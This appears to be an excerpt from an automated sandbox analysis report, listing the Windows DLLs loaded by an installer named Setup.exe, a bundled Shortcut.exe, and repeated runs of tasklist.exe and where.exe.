Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mf.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mfplat.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: rtworkq.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\where.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mswsock.dll
